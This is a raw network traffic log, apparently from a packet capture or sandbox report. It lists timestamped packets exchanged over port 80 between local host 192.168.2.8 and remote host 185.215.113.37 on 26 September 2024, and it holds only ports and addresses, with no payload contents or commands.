Sep 26, 2024 02:40:12.801915884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.801928043 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.801938057 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.801955938 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.801968098 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.801980972 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.801990032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802002907 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802015066 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802026987 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802050114 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802059889 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802102089 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802114964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802128077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802138090 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802140951 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802150965 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802156925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802165031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802171946 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802179098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802192926 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802211046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802227974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802232981 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802265882 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802277088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802289009 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802300930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802313089 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802315950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802330971 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802345037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802361012 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802417994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802459002 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802530050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802542925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802552938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802563906 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802568913 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802577019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802587032 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802589893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802604914 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802612066 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802617073 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802624941 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802632093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802654982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802670956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802678108 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802685976 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802697897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802711010 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802725077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802745104 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802822113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802834988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802846909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802860022 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802860975 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802874088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802875042 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802886963 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802896976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802901983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802913904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802922010 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802933931 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.802941084 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802963972 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802983046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.802984953 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803024054 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803049088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803061962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803073883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803086996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803088903 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803098917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803127050 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803158045 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803170919 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803183079 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803195953 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803198099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803209066 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803220987 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803225994 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803234100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803247929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803261995 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803286076 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803442955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803461075 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803472996 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803474903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803489923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.803492069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803513050 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.803529024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837196112 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837279081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837292910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837306023 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837337017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837347031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837358952 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837373018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837383986 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837384939 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837398052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837410927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837412119 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837444067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837446928 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837455988 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837457895 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837471962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837486029 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837502003 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837521076 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837538004 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837551117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837572098 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837589025 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837625980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837639093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837651968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837666988 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837687969 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837733030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837745905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837760925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837774038 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837775946 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837805986 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837832928 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837861061 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837873936 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837886095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.837903976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.837927103 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.874856949 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.879666090 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:13.624697924 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:13.624923944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:13.742096901 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:13.747009039 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:14.463972092 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:14.464049101 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:15.151315928 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:15.156264067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:15.869705915 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:15.870004892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.291759968 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.296675920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693466902 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693509102 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693521023 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693526983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693536043 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693547010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693553925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693561077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693566084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693603039 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693608999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693622112 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693629026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693633080 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693644047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693655014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693655968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693669081 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693672895 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693702936 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693706989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.693712950 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.693754911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694140911 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694152117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694184065 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694200993 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694571972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694585085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694597006 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694608927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694621086 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694631100 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694633961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694643021 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694649935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694662094 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694674969 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694685936 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694695950 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694699049 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694714069 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694725990 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694726944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694740057 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694741011 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694752932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694755077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694770098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694771051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694782972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694786072 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694797993 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694797993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694822073 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694941044 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694953918 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694964886 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694977999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694977999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.694977999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.694996119 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.695007086 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.695009947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.695023060 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.695070028 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.695070028 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.695136070 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.776949883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.776969910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.776992083 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777007103 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777019978 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777031898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777039051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777054071 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777065992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777077913 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777082920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777092934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777103901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777115107 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777115107 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777129889 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777136087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777142048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777154922 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777165890 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777183056 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777204037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777267933 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777280092 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777291059 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777298927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777316093 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777331114 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777334929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777348042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777369976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777385950 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777434111 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777445078 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777462959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777467012 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777477026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777482033 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777489901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777498960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777503967 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777518034 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777529001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777545929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777582884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777594090 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777611971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777614117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777626038 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777631044 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777637959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777650118 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777651072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777662039 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777663946 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777679920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777693987 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777828932 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777838945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777849913 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777862072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777872086 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777875900 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777884960 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777889967 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777899027 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777909040 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777911901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777931929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777956963 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.777970076 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777981997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.777995110 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778007030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778009892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.778028965 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.778057098 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.778126955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778137922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778143883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778155088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778167963 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778172016 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.778183937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778191090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.778194904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.778208971 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.778235912 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.906075001 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906091928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906111956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906122923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906136036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906145096 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.906160116 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906174898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906189919 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906188011 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.906188011 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.906205893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906220913 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906220913 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.906234980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906245947 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:16.906248093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:16.906255007 CEST	49705	80	192.168.2.8	185.215.113.37
